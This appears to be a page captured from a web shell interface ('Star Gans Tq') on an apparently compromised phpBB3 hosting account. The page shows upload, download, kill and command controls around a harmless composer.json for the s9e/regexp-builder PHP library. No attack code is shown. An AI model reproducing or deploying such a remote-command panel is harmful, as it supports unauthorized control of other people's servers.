.=< { Star Gans Tq } >=.

  • Home

  • Killme
  • Download
  • Current Path : /home/m/e/h/meharicl/www/phpBB3/vendor/s9e/regexp-builder/
    Upload File
    @Command ~ $  
    Current File : /home/m/e/h/meharicl/www/phpBB3/vendor/s9e/regexp-builder/composer.json

    {
    	"name": "s9e/regexp-builder",
    	"type": "library",
    	"description": "Single-purpose library that generates regular expressions that match a list of strings.",
    	"homepage": "https://github.com/s9e/RegexpBuilder/",
    	"keywords": ["regexp"],
    	"license": "MIT",
    	"require": {
    		"lib-pcre": ">=7.2",
    		"php":      ">=5.5.1"
    	},
    	"require-dev": {
    		"phpunit/phpunit": "*"
    	},
    	"autoload": {
    		"psr-4": {
    			"s9e\\RegexpBuilder\\": "src"
    		}
    	},
    	"autoload-dev": {
    		"psr-4": {
    			"s9e\\RegexpBuilder\\Tests\\": "tests"
    		}
    	}
    }